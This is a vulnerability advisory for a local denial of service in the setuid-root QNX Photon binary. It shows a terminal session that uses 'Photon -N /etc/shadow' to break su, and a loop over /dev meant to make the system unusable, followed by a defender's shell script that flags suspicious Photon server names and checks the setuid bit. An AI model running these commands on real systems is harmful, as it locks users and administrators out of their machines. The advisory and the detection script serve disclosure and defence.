#
# QNX 6.x Photon denial of service vulnerability by cenobyte 2013
#
#
# - vulnerability description:
# QNX setuid root /usr/photon/bin/Photon allows users to create new servers with
# arbitrary filenames registered with the -N parameter.
# Photon does not check whether files exist and/or the owner of the file is the
# same as the user. Thus any user can create a new server with a filename such
# as /etc/shadow, resulting in a denial of service attack.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
# QNX 6.3.0
# QNX 6.2.0

$ id
uid=100(user) gid=100
$ /usr/photon/bin/Photon -N /etc/shadow
$ su -
su error: Password and Shadow files on different devices
$ ps -edaf | grep Photon
 100 4524851 4520182 - Oct26 ? 00:00:00 /usr/photon/bin/Photon -N /etc/shadow
$ kill -9 4524851
$ su -
password:
Sat Oct 26 13:22:38 2013 on /dev/ttyp1
Last login: Sat Oct 26 02:43:08 2013 on /dev/ttyp1
edit the file .profile if you want to change your environment.
To start the Photon windowing environment, type "ph".

# If you want to make the system unusable:
$ for x in $(ls /dev); do /usr/photon/bin/Photon -N "/dev/$x"; done
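A defender's check for this issue, added here as an example and not part of cenobyte's advisory: it scans `ps -edaf`-style output for Photon instances whose `-N` name lies outside the expected Photon device prefix, and reports whether the binary still carries the setuid bit. The default server name `/dev/photon`, the prefix argument and the sample ps lines are assumptions constructed for the example.

```shell
#!/bin/sh
# List Photon servers registered (via -N) under a name outside the expected
# prefix. Reads ps -edaf style lines on stdin; prints uid, pid and the name.
flag_photon_names() {
    # $1: prefix of legitimate server names (assumption: /dev/photon is the default)
    prefix="${1:-/dev/photon}"
    awk -v prefix="$prefix" '
        / \/usr\/photon\/bin\/Photon / {
            for (i = 1; i <= NF; i++) {
                if ($i == "-N" && i < NF) {
                    name = $(i + 1)
                    # index()==1 means the name starts with the allowed prefix
                    if (index(name, prefix) != 1) {
                        printf "uid=%s pid=%s name=%s\n", $1, $2, name
                    }
                }
            }
        }'
}

# Constructed sample of ps output (not a real capture): the advisory's
# /etc/shadow case, a tty device, a benign default server and the grep itself.
SAMPLE_PS='UID PID PPID C STIME TTY TIME CMD
 100 4524851 4520182 - Oct26 ? 00:00:00 /usr/photon/bin/Photon -N /etc/shadow
 100 4524900 4520182 - Oct26 ? 00:00:00 /usr/photon/bin/Photon -N /dev/ttyp1
   0 4521000       1 - Oct26 ? 00:00:00 /usr/photon/bin/Photon -N /dev/photon
 100 4525000 4520182 - Oct26 ? 00:00:00 grep Photon'

# Number of suspicious Photon servers in the sample.
suspicious_count() {
    printf '%s\n' "$SAMPLE_PS" | flag_photon_names /dev/photon | wc -l | tr -d ' '
}

# The setuid bit is what turns an unchecked -N name into a root-owned file
# grab; report whether the installed binary still has it.
setuid_check() {
    bin="${1:-/usr/photon/bin/Photon}"
    if [ -u "$bin" ]; then echo "setuid"; else echo "not-setuid-or-missing"; fi
}
```

On a live system, replace the sample with `ps -edaf | flag_photon_names` and treat any reported name that is not a Photon device as a process to investigate.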